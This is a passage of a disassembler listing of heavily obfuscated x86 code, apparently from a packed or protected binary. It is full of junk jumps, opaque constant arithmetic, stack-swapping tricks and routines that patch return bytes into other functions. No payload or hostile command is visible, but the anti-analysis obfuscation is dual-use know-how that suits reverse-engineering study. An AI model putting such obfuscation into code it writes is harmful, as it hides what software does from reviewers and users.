; FUNCTION CHUNK AT 004560CE SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	eax
		call	sub_449765

loc_448163:				; CODE XREF: y2kk37jd:00442C65j
		jmp	loc_43E563
sub_448159	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B0A5

loc_448168:				; CODE XREF: sub_45B0A5-A70Aj
		pop	edx
		add	edx, 87212606h
		xor	edx, 0CFBDFBDCh
		add	edx, 2A768950h
		popf
		xchg	edx, [esp-8+arg_4]
		jmp	sub_454413
; END OF FUNCTION CHUNK	FOR sub_45B0A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_466. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_447BF0
		jmp	loc_459EB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_448192:				; CODE XREF: sub_43C865:loc_43F094j
					; sub_43C865+16D03j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44680C
		jmp	loc_456D58
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------

loc_4481A3:				; CODE XREF: y2kk37jd:004476ABj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44DE34
		jmp	loc_43BA11
; ---------------------------------------------------------------------------
		push	441DADh
		jmp	loc_44AFD3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_42. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_4481C2:				; CODE XREF: sub_4597AE+6j
		jmp	loc_43C1B3
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_4481C7:				; CODE XREF: sub_449C4F-5BC5j
		jmp	loc_4419C1
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_4481CC:				; CODE XREF: sub_443AA7+1Aj
		jnz	loc_440F7D
		jmp	loc_43B83D
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_427. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_4481D9:				; CODE XREF: y2kk37jd:loc_4408F2j
					; sub_44610D:loc_45439Bj
		jmp	nullsub_316
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------

loc_4481DE:				; CODE XREF: y2kk37jd:loc_453755j
		push	ebx
		push	21D27CBCh
		jmp	loc_44AEBE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_388. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_4481EA:				; CODE XREF: sub_45ADEC-DCAAj
		jmp	loc_44D890
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DD0E

loc_4481EF:				; CODE XREF: sub_43DD0E+883Ej
		jmp	nullsub_173
; END OF FUNCTION CHUNK	FOR sub_43DD0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44310A

loc_4481F4:				; CODE XREF: sub_44310A+12j
		jmp	loc_4580A9
; END OF FUNCTION CHUNK	FOR sub_44310A
; ---------------------------------------------------------------------------
		adc	ecx, 319A1B46h
		jmp	loc_44EFCF
; ---------------------------------------------------------------------------
		mov	eax, 0C684C00Ch
		call	sub_442C3E
		mov	ds:off_41E088, eax
		lea	eax, sub_44F641
		mov	byte ptr [eax],	0C3h
		jmp	sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460D0

loc_448222:				; CODE XREF: sub_4460D0+13j
		or	eax, eax
		jnz	loc_44E9F7
		jmp	loc_442464
; END OF FUNCTION CHUNK	FOR sub_4460D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_44822F:				; CODE XREF: sub_44113A:loc_44DDDAj
		jz	loc_44A9FB

loc_448235:				; CODE XREF: sub_4490B4:loc_45B51Bj
		jmp	loc_450D8A
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_44823A:				; CODE XREF: sub_448700+13j
		jmp	loc_454FB8
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
		add	eax, ebx
		xor	eax, ecx
		or	eax, 155013EAh
		pop	ecx
		jmp	loc_44A9F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459F8F

loc_44824F:				; CODE XREF: sub_459F8F:loc_450626j
		pop	eax
		or	eax, 9677D733h
		and	eax, 0E0154E4Fh
		js	loc_451038
; END OF FUNCTION CHUNK	FOR sub_459F8F
; START	OF FUNCTION CHUNK FOR sub_445226

loc_448262:				; CODE XREF: sub_445226+F693j
		jmp	loc_45412A
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_448267:				; CODE XREF: sub_44C4BC-9118j
		jmp	loc_44E29C
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_44826C:				; CODE XREF: sub_442EB4-2E2Fj
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_442EB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F1C4

loc_448271:				; CODE XREF: sub_43F1C4-1D48j
		jmp	loc_44AE42
; END OF FUNCTION CHUNK	FOR sub_43F1C4
; ---------------------------------------------------------------------------
		xor	ebx, 3DCF5F87h
		jmp	loc_440F32
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_102. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_448282:				; CODE XREF: sub_4429DD+Dj
		jmp	loc_455AB5
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E840

loc_448287:				; CODE XREF: sub_44E840-8B39j
		xchg	ebx, esi
		jz	loc_454D79
		push	esi

loc_448290:				; CODE XREF: sub_44E840:loc_445CFBj
		add	esi, 0F014FAFFh
		jmp	loc_43F9F5
; END OF FUNCTION CHUNK	FOR sub_44E840
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455299

loc_44829B:				; CODE XREF: sub_455299:loc_4552A5j
		push	offset loc_455806
		jmp	nullsub_162
; END OF FUNCTION CHUNK	FOR sub_455299
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_4482A5:				; CODE XREF: sub_44B814:loc_4486C2j
		sub	edx, 1818CDE9h
		test	edx, 1000000h
		jmp	loc_44EAFE
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_4482B6:				; CODE XREF: sub_4458DDj
		mov	eax, ds:dword_4438A8
		or	eax, eax
		jnz	loc_443D21
		jmp	loc_44B532
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458FCE

loc_4482C9:				; CODE XREF: sub_458FCE:loc_44CEE1j
		add	edx, ebp
		push	offset sub_43E1E9
		jmp	loc_45B0A0
; END OF FUNCTION CHUNK	FOR sub_458FCE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F285

loc_4482D5:				; CODE XREF: sub_43F285+1257Aj
		rol	edi, 1Ch
		add	edi, 7D41A73Fh
		xchg	edi, [esp+0]
		jmp	loc_43C34B
; END OF FUNCTION CHUNK	FOR sub_43F285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EDF8

loc_4482E6:				; CODE XREF: sub_44EDF8:loc_4459D8j
		push	eax
		push	724EFEACh
		pop	eax
		sub	eax, 0D1EE3E43h
		call	sub_43B488
; END OF FUNCTION CHUNK	FOR sub_44EDF8
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_4482F8:				; CODE XREF: sub_44DED9-1289Ej
		rol	ebp, 1Fh

loc_4482FB:				; CODE XREF: y2kk37jd:loc_448539j
					; sub_44DED9:loc_44EBC9j
		call	sub_448306
		retn
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458CC4

loc_448301:				; CODE XREF: sub_458CC4+14j
		jmp	loc_457010
; END OF FUNCTION CHUNK	FOR sub_458CC4

; =============== S U B	R O U T	I N E =======================================



sub_448306	proc near		; CODE XREF: sub_44DED9:loc_4482FBp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00449798 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004519DD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B144 SIZE 00000005 BYTES

		push	eax
		push	ebp
		pop	eax
		jmp	loc_45B144
sub_448306	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	ecx, esi
		add	edi, ebx
		jmp	sub_4538AC
; ---------------------------------------------------------------------------

loc_448317:				; CODE XREF: y2kk37jd:0043D748j
		jz	loc_449E59

loc_44831D:				; CODE XREF: y2kk37jd:loc_451695j
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]
		lea	eax, dword_44C240
		jmp	loc_45A777
; ---------------------------------------------------------------------------

loc_44832E:				; CODE XREF: y2kk37jd:loc_445EACj
		jge	loc_451F2C
; START	OF FUNCTION CHUNK FOR sub_44B47E

loc_448334:				; CODE XREF: sub_44B47E+821Dj
		jmp	loc_44D856
; END OF FUNCTION CHUNK	FOR sub_44B47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451C7D

loc_448339:				; CODE XREF: sub_451C7D-11850j
		jmp	loc_45A3B5
; END OF FUNCTION CHUNK	FOR sub_451C7D
; ---------------------------------------------------------------------------
		xor	esi, 2FA3DD29h
		mov	[edx], ebx
		jmp	loc_451F21
; ---------------------------------------------------------------------------

loc_44834B:				; DATA XREF: sub_4440AB:loc_44267Ao
		jmp	loc_4569CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_448350:				; CODE XREF: sub_444463+11D4Ej
					; sub_4440AB+12F35j
		xchg	edi, [esp-4+arg_0]
		mov	ecx, edi
		pop	edi
		xchg	esi, [esp+0]
		jmp	loc_43C322
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------

loc_44835E:				; CODE XREF: y2kk37jd:00443785j
		jnz	loc_4478F2
		jmp	loc_445960
; ---------------------------------------------------------------------------

loc_448369:				; CODE XREF: y2kk37jd:0043B938j
		pop	ebx
		push	offset sub_44F7E1
		jmp	locret_44AD38
; ---------------------------------------------------------------------------
		mov	[edi], edx
		pop	edx
		jmp	sub_44C79E
; ---------------------------------------------------------------------------

loc_44837C:				; CODE XREF: y2kk37jd:004467CCj
		sbb	edx, ebx

loc_44837E:				; CODE XREF: y2kk37jd:004559F5j
		mov	edx, ebp
		sub	esi, 6626224h
		jo	loc_4556CA
		jmp	loc_4571DC
; ---------------------------------------------------------------------------

loc_448391:				; CODE XREF: y2kk37jd:loc_456CCEj
		not	esi
		cdq
		xor	edx, ecx
		sub	eax, 80BD0351h
		rol	edi, 5
		jmp	loc_459B1B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_4483A4:				; CODE XREF: sub_44A6B5:loc_43C0A0j
		jz	loc_44DFF9
		jmp	loc_459A8F
; END OF FUNCTION CHUNK	FOR sub_44A6B5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_491. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4483B0:				; CODE XREF: sub_445226+2BDj
		jmp	nullsub_55
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_4483B5	proc near		; DATA XREF: y2kk37jd:004463C5o

; FUNCTION CHUNK AT 0044D03A SIZE 00000005 BYTES

		call	sub_442C3E
		mov	ds:dword_41E05C, eax
		lea	eax, nullsub_442
		mov	byte ptr [eax],	0C3h
		jmp	loc_44D03A
sub_4483B5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44131E

loc_4483CE:				; CODE XREF: sub_44131E+3j
		mov	eax, [esp-4+arg_0]
		push	eax
		and	eax, edi
		jmp	loc_442A30
; END OF FUNCTION CHUNK	FOR sub_44131E
; ---------------------------------------------------------------------------

loc_4483D9:				; CODE XREF: y2kk37jd:0044717Cj
		shr	ecx, 15h
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_4483DC:				; CODE XREF: sub_43BD0D+EE04j
		rol	esi, 8
		or	esi, 45729C71h
		rol	esi, 1Bh
		xor	esi, 13DA2549h
		xor	eax, esi
		pop	esi
		push	edx
		jmp	loc_4428FD
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_4483F7:				; CODE XREF: sub_456809:loc_43E855j
		jz	loc_44D4F9
		jmp	loc_454584
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_448402:				; CODE XREF: sub_440337:loc_43D5ECj
		add	edi, 5C3DFE3Eh
		xchg	edi, [esp+0]
		jmp	loc_4500A2
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE06

loc_448410:				; CODE XREF: sub_43FE06-64Dj
		pop	esi
		rol	eax, 18h
		push	offset sub_43DA43
		jmp	nullsub_235
; END OF FUNCTION CHUNK	FOR sub_43FE06
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_266. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4497DA

loc_44841F:				; CODE XREF: sub_4497DA+9j
		jmp	loc_45A1CE
; END OF FUNCTION CHUNK	FOR sub_4497DA
; ---------------------------------------------------------------------------

loc_448424:				; CODE XREF: y2kk37jd:0043B2E0j
		jmp	loc_45A959
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_448429:				; CODE XREF: sub_4562E5+4BA6j
		pop	eax
		and	eax, 443340C3h
		add	eax, 6C31EF43h
		or	eax, 0A3B4A35Dh
		jmp	loc_458C89
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------

loc_448441:				; CODE XREF: y2kk37jd:0043D57Cj
		call	sub_43C06A
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_448446:				; CODE XREF: sub_440F0C:loc_451E1Bj
		mov	ebx, edi
		pop	edi
		and	ebx, 26186A6h
		cmp	ebx, 8CE4C8D8h
		jmp	loc_45B051
; END OF FUNCTION CHUNK	FOR sub_440F0C
; ---------------------------------------------------------------------------
		xchg	ebx, edx
		jmp	loc_45C3A6
; ---------------------------------------------------------------------------

loc_448461:				; DATA XREF: sub_45704E-9B9Do
		or	eax, eax
		jnz	loc_43B3C8
		jmp	loc_45617B
; ---------------------------------------------------------------------------

loc_44846E:				; CODE XREF: y2kk37jd:004502D6j
		sbb	esi, edx
		not	eax
		sub	ecx, 1E69969Eh
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_448478:				; CODE XREF: sub_442A84+16E72j
		and	eax, 0EA85445Ah
		xor	eax, 7769CCF9h
		add	eax, ebp
		add	eax, 0E81236E9h
		jmp	loc_455F12
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44229C

loc_448491:				; CODE XREF: sub_44229C:loc_4422A7j
		xor	ecx, 0D0AF9E8Dh
		add	ecx, 65A653E5h
		xor	eax, ecx
		pop	ecx
		push	offset sub_455C2D
		jmp	nullsub_77
; END OF FUNCTION CHUNK	FOR sub_44229C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_4484AA:				; CODE XREF: sub_44606C-3B7Dj
		jge	loc_44DD63
		shr	eax, 13h
		and	eax, edx
		jmp	loc_44DD62
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------

loc_4484BA:				; CODE XREF: y2kk37jd:0043FDB2j
		jno	loc_45B839
		jg	locret_447E26

loc_4484C6:				; CODE XREF: y2kk37jd:loc_43FDA5j
		add	edi, 35345164h
		test	edi, 200h
		jmp	loc_4564B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E9

loc_4484D7:				; CODE XREF: sub_4554E9+11j
		push	83784334h
		pop	ebx
		rol	ebx, 1Bh

loc_4484E0:				; CODE XREF: y2kk37jd:loc_45279Dj
		xor	ebx, 7B6DE24h
		and	ebx, 19BEA5EDh
		or	ebx, 72A11C93h
		jmp	loc_446E7D
; END OF FUNCTION CHUNK	FOR sub_4554E9

; =============== S U B	R O U T	I N E =======================================



sub_4484F7	proc near		; CODE XREF: y2kk37jd:004477EAp
					; y2kk37jd:004587D5j

; FUNCTION CHUNK AT 0043EDFA SIZE 00000015 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [ebp-4]
		and	dword ptr [eax+24h], 7FFFFFFFh
		lea	eax, [ebp-14h]
		push	eax
		mov	eax, [ebp-14h]
		push	eax
		jmp	loc_43EDFA
sub_4484F7	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_448512	proc near		; CODE XREF: sub_4411C3+1364Ap
					; y2kk37jd:004590C6j

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00447C0F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D667 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AB60 SIZE 0000000C BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	edx, eax
		call	sub_4581BB
		pop	edx
		xchg	ebx, [esp-8+arg_4]
		jmp	loc_447C0F
sub_448512	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_448526	proc near		; DATA XREF: sub_459789:loc_43D933o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00446CA6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447108 SIZE 00000007 BYTES

		push	edx
		push	eax
		pop	edx
		xchg	edx, [esp+4+var_4]
		lea	eax, dword_44F504
		push	eax
		push	eax
		jmp	loc_446CA6
sub_448526	endp

; ---------------------------------------------------------------------------

loc_448539:				; CODE XREF: y2kk37jd:0044C81Ej
		jo	loc_4482FB

; =============== S U B	R O U T	I N E =======================================



sub_44853F	proc near		; CODE XREF: sub_4460D0+112EDp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004414A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044652F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004558BF SIZE 00000008 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	0E8639268h
		pop	eax
		or	eax, 0E605CFF8h
		sub	eax, 69471E86h
		add	eax, 7B23CA38h
		jmp	loc_44652F
sub_44853F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_448560:				; CODE XREF: sub_442A84:loc_44AA76j
		not	ebx
		cmp	edi, 0CE20F151h
		jmp	loc_456638
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------

loc_44856D:				; CODE XREF: y2kk37jd:00451EB0j
		sbb	ebp, 52CD502Bh

; =============== S U B	R O U T	I N E =======================================



sub_448573	proc near		; CODE XREF: sub_44D302:loc_45B633p

; FUNCTION CHUNK AT 00446A9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C235 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [ebp-20h]
		jmp	loc_45C235
sub_448573	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448770

loc_44857F:				; CODE XREF: sub_448770:loc_44A7FCj
		shr	edi, 14h
		jmp	loc_44F2E1
; END OF FUNCTION CHUNK	FOR sub_448770

; =============== S U B	R O U T	I N E =======================================



sub_448587	proc near		; DATA XREF: sub_4448C1:loc_4448C8o

; FUNCTION CHUNK AT 00445F32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A242 SIZE 0000001C BYTES

		js	loc_45A242
		cmp	dword ptr [eax], 0FFFFFFFFh
		mov	ebx, [eax+4]
		mov	eax, [eax]
		jnz	loc_4448C8
		retn
sub_448587	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CBDE

loc_44859C:				; CODE XREF: sub_43CBDE+10j
		jz	loc_43CBAC
		jmp	loc_43CF27
; END OF FUNCTION CHUNK	FOR sub_43CBDE
; ---------------------------------------------------------------------------

locret_4485A7:				; CODE XREF: y2kk37jd:00444E52j
		retn
; ---------------------------------------------------------------------------

loc_4485A8:				; CODE XREF: y2kk37jd:0044CD85j
		jmp	loc_459661
; ---------------------------------------------------------------------------

loc_4485AD:				; CODE XREF: y2kk37jd:loc_43F47Ej
		jnz	loc_453FE1
		jmp	loc_447488
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E1C

loc_4485B8:				; CODE XREF: sub_445E1C:loc_459DDEj
		call	sub_442C3E
		push	esi
		push	7CF3E53h
		pop	esi
		sub	esi, 4759BD9Dh
		test	esi, 1000000h
		jmp	loc_449390
; END OF FUNCTION CHUNK	FOR sub_445E1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_4485D5:				; CODE XREF: sub_4599BE:loc_441A12j
		or	edi, 4AB4F4Fh
		xor	edi, 28642DCBh
		xor	eax, edi
		pop	edi
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		push	edi
		jmp	loc_441F3B
; END OF FUNCTION CHUNK	FOR sub_4599BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508C4

loc_4485F0:				; CODE XREF: sub_4508C4:loc_4516B0j
		cmp	ds:dword_449C24, 0
		jnz	loc_44DB5E
		lea	edx, [ebp-14h]
		mov	eax, offset dword_449C28
		call	sub_4581BB
		jmp	loc_44A0B5
; END OF FUNCTION CHUNK	FOR sub_4508C4
; ---------------------------------------------------------------------------
		adc	esi, edi
		jmp	loc_443DA5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_448616:				; CODE XREF: sub_4429DD+17E6j
		jl	loc_458AF2
		jmp	loc_44FAA5
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_448621:				; CODE XREF: sub_44CEAB:loc_43DD23j
					; DATA XREF: sub_447B79+9o
		xor	eax, eax
		mov	[ebp-0Ch], eax
		call	sub_44255B
		or	eax, esi
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; START	OF FUNCTION CHUNK FOR sub_457524

loc_44862D:				; CODE XREF: sub_457524:loc_44C398j
		jmp	sub_44BD20
; END OF FUNCTION CHUNK	FOR sub_457524
; ---------------------------------------------------------------------------
		jnz	loc_44A1B6
		jmp	loc_43E0D8
; ---------------------------------------------------------------------------

loc_44863D:				; CODE XREF: y2kk37jd:00446455j
		pop	eax
		and	eax, 0DA09BFF3h
		add	eax, 263D0408h
		xchg	eax, [esp]
		jmp	loc_44680F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_448652:				; CODE XREF: sub_43E679:loc_44EF2Cj
		jnp	loc_43D4A0
; END OF FUNCTION CHUNK	FOR sub_43E679

; =============== S U B	R O U T	I N E =======================================



sub_448658	proc near		; CODE XREF: sub_44594E:loc_45A07Ap

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C633 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C69E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442E73 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F8EB SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00450F8E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00457E76 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A429 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	edi, [esp-4+arg_0]

loc_44865F:				; CODE XREF: y2kk37jd:00455F73j
		mov	eax, edi
		pop	edi
		add	eax, 0FF1FB6D1h
		jmp	loc_43C69E
sub_448658	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44866D	proc near		; CODE XREF: sub_442C3E+17CFBp

; FUNCTION CHUNK AT 004459C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447EDE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044DBF1 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045599C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457067 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	edx, 0F53E3314h
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_440301
		jmp	loc_45599C
sub_44866D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_448686	proc near		; DATA XREF: sub_44A298:loc_4529A8o
		xor	eax, eax
		retn
sub_448686	endp

; ---------------------------------------------------------------------------

loc_448689:				; CODE XREF: y2kk37jd:0044D5E2j
		jmp	loc_455BCA
; ---------------------------------------------------------------------------

loc_44868E:				; CODE XREF: y2kk37jd:004414D1j
		jmp	loc_43BCB3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A298

loc_448693:				; CODE XREF: sub_44A298+10466j
		push	ecx
		mov	ecx, [esp+10h]
		jmp	loc_448F2B
; END OF FUNCTION CHUNK	FOR sub_44A298
; ---------------------------------------------------------------------------

loc_44869D:				; CODE XREF: y2kk37jd:loc_45312Dj
		mov	ds:dword_41E14C, eax
		lea	eax, nullsub_481
		mov	byte ptr [eax],	0C3h
		jmp	loc_44D277

; =============== S U B	R O U T	I N E =======================================



sub_4486B1	proc near		; CODE XREF: sub_406424+27p
					; sub_40E02D+134p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044B747 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00450FDA SIZE 00000005 BYTES

		push	eax
		mov	eax, esi
		xchg	eax, [esp+4+var_4]
		jmp	loc_450FDA
sub_4486B1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_4486BC:				; CODE XREF: sub_44B814+1A4j
		jl	loc_445520

loc_4486C2:				; CODE XREF: sub_44C304:loc_4586CCj
		jmp	loc_4482A5
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4536F2

loc_4486C7:				; CODE XREF: sub_445226:loc_43CFBCj
					; sub_4536F2:loc_45370Aj
		jmp	nullsub_155
; END OF FUNCTION CHUNK	FOR sub_4536F2
; ---------------------------------------------------------------------------
		xchg	ebx, edi
		sub	ecx, 0F843362h
		jmp	loc_44551D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B86B

loc_4486D9:				; CODE XREF: sub_44B86B:loc_44BF5Aj
		xchg	esi, [esp-4+arg_0]
		jmp	sub_4487FD
; END OF FUNCTION CHUNK	FOR sub_44B86B

; =============== S U B	R O U T	I N E =======================================



sub_4486E1	proc near		; CODE XREF: sub_43C851+40E9p
					; y2kk37jd:004468F4j

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043FA31 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044189E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00445F82 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455EBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004560EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458AAD SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00458D3B SIZE 00000005 BYTES

		xchg	esi, [esp-8+arg_4]
		pop	esi
		add	eax, 242B23A8h
		add	eax, ebp
		add	eax, 1FD7167Eh
		mov	eax, [eax]
		mov	ecx, [eax+4]
		mov	eax, [ebp-24h]
		jmp	loc_455EBE
sub_4486E1	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_448700	proc near		; DATA XREF: sub_445226-9B6Do

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B019 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B6FD SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0043E23C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043E79A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F292 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043F616 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00442D2F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443B6E SIZE 00000018 BYTES
